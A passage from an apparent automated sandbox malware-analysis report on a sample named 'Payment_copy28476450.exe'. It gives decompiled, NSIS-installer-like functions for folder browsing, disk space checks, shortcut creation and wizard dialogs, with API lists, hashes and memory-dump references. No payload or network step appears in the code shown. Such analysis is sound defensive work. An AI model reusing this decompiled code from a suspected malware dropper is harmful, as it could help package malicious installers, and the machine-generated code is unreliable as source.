							}
							E00405CFB(0x41f548, _t146);
							_t87 = E00406087(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405CFB(0x41f548, _t146);
								_t89 = E00405882(0x41f548);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f548,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41f548) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41f548,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E00405835(0x41f548) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41f548) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404889(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42375c + 0x10)) != _t158) {
									E00404871(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41f538);
									} else {
										E004047AC(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x424024 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403FD9(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42056c == _t158) {
									E0040438A();
								}
								 *0x42056c = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420580;
							_v60 = E00404746;
							_v56 = _t146;
							_v68 = E00405D1D(_t146, 0x420580, _t166, 0x41f950, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004057EE(_t146);
								_t125 =  *((intOrPtr*)( *0x423f90 + 0x11c));
								if( *((intOrPtr*)( *0x423f90 + 0x11c)) != 0 && _t146 == "C:\\Users\\engineer\\AppData\\Local\\Temp") {
									E00405D1D(_t146, 0x420580, _t166, 0, _t125);
									if(lstrcmpiA(0x422f20, 0x420580) != 0) {
										lstrcatA(_t146, 0x422f20);
									}
								}
								 *0x42056c =  *0x42056c + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E0040585B(_t146) != 0 && E00405882(_t146) == 0) {
						E004057EE(_t146);
					}
					 *0x423758 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403FB7(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403FB7(_t166);
					E00403FEC(_t165);
					_t138 = E00406087(0xa);
					if(_t138 == 0) {
						L53:
						return E0040401E(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}

0x004043f5
0x004043fb
0x00404401
0x0040440e
0x0040441c
0x0040441f
0x00404427
0x0040442d
0x0040442d
0x00404439
0x0040443c
0x004044aa
0x004044b1
0x00404588
0x0040458f
0x0040459e
0x0040459e
0x004045a2
0x004045ac
0x004045b9
0x004045bb
0x004045bb
0x004045c9
0x004045d0
0x004045d7
0x004045da
0x00404611
0x00404613
0x00404619
0x0040461e
0x00404622
0x00404624
0x00404624
0x00404640
0x00000000
0x00404642
0x00404645
0x00404653
0x00404659
0x0040465a
0x0040465d
0x00404660
0x00000000
0x00404660
0x004045dc
0x004045de
0x004045e2
0x00000000
0x00000000
0x00000000
0x00000000
0x004045e4
0x004045e4
0x004045f1
0x004045f6
0x00000000
0x00000000
0x004045fa
0x004045fc
0x004045fc
0x00404607
0x0040460a
0x0040460f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040460f
0x0040466c
0x00404676
0x00404679
0x0040467c
0x00404683
0x00404683
0x00404685
0x00404685
0x0040468a
0x0040468c
0x00404694
0x0040469b
0x0040469d
0x004046a8
0x004046a8
0x0040469d
0x004046b8
0x004046c2
0x004046ca
0x004046e5
0x004046cc
0x004046d5
0x004046d5
0x004046ca
0x004046ea
0x004046ef
0x004046f4
0x004046fd
0x004046fd
0x00404706
0x00404708
0x00404708
0x00404714
0x0040471c
0x00404726
0x00404726
0x0040472b
0x00000000
0x0040472b
0x004045da
0x00404591
0x00404598
0x00000000
0x00000000
0x00000000
0x00404598
0x004044b7
0x004044c0
0x004044da
0x004044df
0x004044e9
0x004044f0
0x004044fc
0x004044ff
0x00404502
0x00404509
0x00404511
0x00404514
0x00404518
0x0040451f
0x00404527
0x00404581
0x00404529
0x0040452a
0x00404531
0x0040453b
0x00404543
0x00404550
0x00404564
0x00404568
0x00404568
0x00404564
0x0040456d
0x0040457a
0x0040457a
0x00404527
0x00000000
0x004044df
0x004044cd
0x00000000
0x00000000
0x004044d3
0x00000000
0x0040443e
0x0040444b
0x00404454
0x00404461
0x00404461
0x00404468
0x0040446e
0x00404477
0x0040447a
0x0040447d
0x00404485
0x00404488
0x0040448b
0x00404491
0x00404498
0x0040449f
0x00404731
0x00404743
0x004044a5
0x004044a8
0x00000000
0x004044a8
0x0040449f

APIs

GetDlgItem.USER32 ref: 00404444
SetWindowTextA.USER32(00000000,?), ref: 0040446E
SHBrowseForFolderA.SHELL32(?,0041F950,?), ref: 0040451F
CoTaskMemFree.OLE32(00000000), ref: 0040452A
lstrcmpiA.KERNEL32(00422F20,00420580,00000000,?,?), ref: 0040455C
lstrcatA.KERNEL32(?,00422F20), ref: 00404568
SetDlgItemTextA.USER32 ref: 0040457A

Part of subcall function 004055A0: GetDlgItemTextA.USER32 ref: 004055B3

Part of subcall function 00405F5D: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Payment_copy28476450.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FB5
Part of subcall function 00405F5D: CharNextA.USER32(?,?,?,00000000), ref: 00405FC2
Part of subcall function 00405F5D: CharNextA.USER32(?,"C:\Users\user\Desktop\Payment_copy28476450.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FC7
Part of subcall function 00405F5D: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FD7

GetDiskFreeSpaceA.KERNEL32(0041F548,?,?,0000040F,?,0041F548,0041F548,?,00000001,0041F548,?,?,000003FB,?), ref: 00404638
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404653

Part of subcall function 004047AC: lstrlenA.KERNEL32(00420580,00420580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046C7,000000DF,00000000,00000400,?), ref: 0040484A
Part of subcall function 004047AC: wsprintfA.USER32 ref: 00404852
Part of subcall function 004047AC: SetDlgItemTextA.USER32 ref: 00404865

Strings

A, xrefs: 00404518
/B, xrefs: 00404556
C:\Users\user\AppData\Local\Temp, xrefs: 00404545

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: /B$A$C:\Users\user\AppData\Local\Temp
API String ID: 2624150263-2119286456
Opcode ID: b7fefc9cacae961b95d378fd6a641a09e61e2e8d2cd41ae2b0be1c13a03d1c60
Instruction ID: 04579f169ebad34731529ea4dd061e989e150d10634133a65e55446a4c87498a
Opcode Fuzzy Hash: b7fefc9cacae961b95d378fd6a641a09e61e2e8d2cd41ae2b0be1c13a03d1c60
Instruction Fuzzy Hash: A5A17EB1900209ABDB11EFA1CC45AAF77B8EF85355F10843BFA01B62D1D77C9A418F69

Uniqueness

Uniqueness Score: -1.00%

Function 00402036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00402036() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A0C(0xfffffff0);
				_t96 = E00402A0C(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A0C(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A0C(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A0C(0x45);
				if(E0040585B(_t96) == 0) {
					E00402A0C(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x4073ac, _t75, 1, 0x40739c, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4073bc, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\engineer\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409448, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409448, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}

0x0040203f
0x00402049
0x00402052
0x0040205c
0x00402065
0x0040206f
0x00402073
0x00402073
0x00402078
0x00402089
0x00402091
0x00402171
0x00402171
0x00402178
0x00402097
0x00402097
0x004020a8
0x004020ac
0x004020b2
0x004020bc
0x004020be
0x004020c9
0x004020cc
0x004020d9
0x004020db
0x004020dd
0x004020e4
0x004020e7
0x004020e7
0x004020ea
0x004020f4
0x004020fc
0x00402101
0x0040210d
0x0040210d
0x00402110
0x00402119
0x0040211c
0x00402125
0x0040212a
0x0040213c
0x0040214b
0x0040214d
0x00402159
0x00402159
0x0040214b
0x0040215b
0x00402161
0x00402161
0x00402164
0x0040216a
0x0040216f
0x00402184
0x00000000
0x00000000
0x00000000
0x0040216f
0x0040217a
0x004028a4
0x004028b0

APIs

CoCreateInstance.OLE32(004073AC,?,00000001,0040739C,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402089
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409448,00000400,?,00000001,0040739C,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402143

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 004020C1

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-1104044542
Opcode ID: 8b9c2e5640cd10c82be1a956849ef5df59aae12c3e21675f706a7f9f4a475de0
Instruction ID: 2bdc35c2d2963d88c22d289f5388ef8df5706d1624f03911357c3292c4b85553
Opcode Fuzzy Hash: 8b9c2e5640cd10c82be1a956849ef5df59aae12c3e21675f706a7f9f4a475de0
Instruction Fuzzy Hash: B2416275A00204BFDB00EFA4CD89E9E7BB6EF49314B20416AF905EB2D1CA79DD41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00402654 Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00402654(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A0C(2), _t19 - 0x19c) != 0xffffffff) {
					E00405C59(__edi, _t6);
					_push(_t19 - 0x170);
					_push(__esi);
					E00405CFB();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x0040266c
0x00402680
0x0040268b
0x0040268c
0x004027c7
0x0040266e
0x0040266e
0x00402670
0x00402672
0x00402672
0x004028a4
0x004028b0

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402663

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 3e31af45bbe9dbcba2c239d5de48bd9256fd7baf997d6aca0ab2e4b00858bcc3
Instruction ID: 2317ffd169cfaf4cb587e6187c2204c3bd1190871e25379d9522107c79eb17b9
Opcode Fuzzy Hash: 3e31af45bbe9dbcba2c239d5de48bd9256fd7baf997d6aca0ab2e4b00858bcc3
Instruction Fuzzy Hash: 3AF0A732508100DAD710E7B49949AEEB368EF51328F60457BE505F20C1C6B84945DB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403AE4 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00403AE4(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t141;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x420564 = _t35;
					if(_t115 == 0x110) {
						 *0x423f88 = _t125;
						 *0x420578 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f540 = _t91;
						E00403FB7(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423768);
						 *0x42374c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420564 = 1;
					}
					_t122 =  *0x4091e8; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423fa0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00404003(0x40b);
						while(1) {
							_t37 =  *0x420564;
							 *0x4091e8 =  *0x4091e8 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091e8; // 0xffffffff
							__eflags = _t39 -  *0x423fa4;
							if(_t39 ==  *0x423fa4) {
								E0040140B(1);
							}
							__eflags =  *0x42374c - _t133;
							if( *0x42374c != _t133) {
								break;
							}
							__eflags =  *0x4091e8 -  *0x423fa4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405D1D(_t116, _t125, _t130, 0x42c800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403FB7(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403FB7(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403FB7(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42400c - _t133;
							_v32 = _t49;
							if( *0x42400c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403FD9(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f540, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42400c - _t133;
							if( *0x42400c == _t133) {
								_push( *0x420578);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f540);
							}
							E00403FEC();
							E00405CFB(0x420580, 0x423780);
							E00405D1D(0x420580, _t125, _t130,  &(0x420580[lstrlenA(0x420580)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420580);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423758);
									 *0x41fd50 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423f80,  *_t130 +  *0x423760 & 0x0000ffff, _t125,  *(0x4091ec +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423758 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403FB7(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423758, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42374c - _t133;
									if( *0x42374c != _t133) {
										goto L61;
									}
									ShowWindow( *0x423758, 8);
									E00404003(0x405);
									goto L58;
								}
								__eflags =  *0x42400c - _t133;
								if( *0x42400c != _t133) {
									goto L61;
								}
								__eflags =  *0x424000 - _t133;
								if( *0x424000 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423758);
						 *0x423f88 = _t133;
						EndDialog(_t125,  *0x41f948);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423758, 0x40f, 0, 1);
						__eflags =  *0x42374c;
						return 0 |  *0x42374c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420558, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420558,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E0040401E(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423758, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42400c - _t133;
										if( *0x42400c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f948 = 1;
											L21:
											_push(0x78);
											L22:
											E00403F90();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f948 = _t127;
										goto L21;
									}
									__eflags =  *0x4091e8 - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423758);
						 *0x423758 = _a12;
						L58:
						_t141 =  *0x421580 - _t133; // 0x0
						if(_t141 == 0 &&  *0x423758 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x421580 = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x00403aed
0x00403af6
0x00403c37
0x00403c3b
0x00403c3f
0x00403c41
0x00403c46
0x00403c51
0x00403c5c
0x00403c61
0x00403c63
0x00403c65
0x00403c68
0x00403c6d
0x00403c7b
0x00403c88
0x00403c8f
0x00403c8f
0x00403c90
0x00403c90
0x00403c95
0x00403c9b
0x00403ca2
0x00403ca8
0x00403caa
0x00403cea
0x00403cef
0x00403cf4
0x00403cf4
0x00403cf9
0x00403d02
0x00403d04
0x00403d09
0x00403d0f
0x00403d13
0x00403d13
0x00403d18
0x00403d1e
0x00000000
0x00000000
0x00403d29
0x00403d2f
0x00000000
0x00000000
0x00403d38
0x00403d40
0x00403d45
0x00403d48
0x00403d4e
0x00403d53
0x00403d56
0x00403d5c
0x00403d61
0x00403d64
0x00403d6a
0x00403d72
0x00403d78
0x00403d7e
0x00403d82
0x00403d89
0x00403d89
0x00403d89
0x00403d93
0x00403da5
0x00403db1
0x00403db6
0x00403dc0
0x00403dc6
0x00403dc8
0x00403dcd
0x00403dca
0x00403dca
0x00403dca
0x00403ddd
0x00403df5
0x00403df7
0x00403dfd
0x00403e12
0x00403dff
0x00403e08
0x00403e0a
0x00403e0a
0x00403e18
0x00403e28
0x00403e39
0x00403e40
0x00403e46
0x00403e4a
0x00403e4f
0x00403e51
0x00000000
0x00403e57
0x00403e57
0x00403e59
0x00000000
0x00000000
0x00403e5f
0x00403e63
0x00403e88
0x00403e8e
0x00403e94
0x00403e96
0x00000000
0x00000000
0x00403ebc
0x00403ec2
0x00403ec4
0x00403ec9
0x00000000
0x00000000
0x00403ecf
0x00403ed2
0x00403ed5
0x00403eec
0x00403ef8
0x00403f11
0x00403f17
0x00403f1b
0x00403f20
0x00403f26
0x00000000
0x00000000
0x00403f30
0x00403f3b
0x00000000
0x00403f3b
0x00403e65
0x00403e6b
0x00000000
0x00000000
0x00403e71
0x00403e77
0x00000000
0x00000000
0x00000000
0x00403e7d
0x00403e51
0x00403f48
0x00403f54
0x00403f5b
0x00000000
0x00403cac
0x00403cac
0x00403caf
0x00403ce2
0x00403ce2
0x00403ce4
0x00000000
0x00000000
0x00000000
0x00403ce4
0x00403cb1
0x00403cb5
0x00403cba
0x00403cbc
0x00000000
0x00000000
0x00403ccc
0x00403cd4
0x00000000
0x00403cda
0x00403b08
0x00403b08
0x00403b0c
0x00403b11
0x00403b20
0x00403b20
0x00403b29
0x00403b32
0x00403b3d
0x00403b3d
0x00403b49
0x00403b65
0x00403b68
0x00403b7b
0x00403b81
0x00403c24
0x00000000
0x00403c2d
0x00403b87
0x00403b94
0x00403b96
0x00403b98
0x00403bb7
0x00403bb7
0x00403bba
0x00403bbf
0x00403bc2
0x00403bd2
0x00403bd3
0x00403bd5
0x00403c0b
0x00403c1e
0x00000000
0x00403c1e
0x00403bd7
0x00403bdd
0x00403bf6
0x00403bfb
0x00403bfd
0x00000000
0x00000000
0x00403bff
0x00403beb
0x00403beb
0x00403bed
0x00403bed
0x00000000
0x00403bed
0x00403be0
0x00403be5
0x00000000
0x00403be5
0x00403bc4
0x00403bca
0x00000000
0x00000000
0x00403bcc
0x00000000
0x00403bcc
0x00403bbc
0x00000000
0x00403bbc
0x00403ba2
0x00403ba9
0x00403baf
0x00403bb1
0x00000000
0x00000000
0x00000000
0x00403bb1
0x00403b6d
0x00000000
0x00403b4b
0x00403b51
0x00403b5b
0x00403f61
0x00403f61
0x00403f67
0x00403f74
0x00403f7a
0x00403f7a
0x00403f84
0x00000000
0x00403f84
0x00403b49

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B20
ShowWindow.USER32(?), ref: 00403B3D
DestroyWindow.USER32 ref: 00403B51
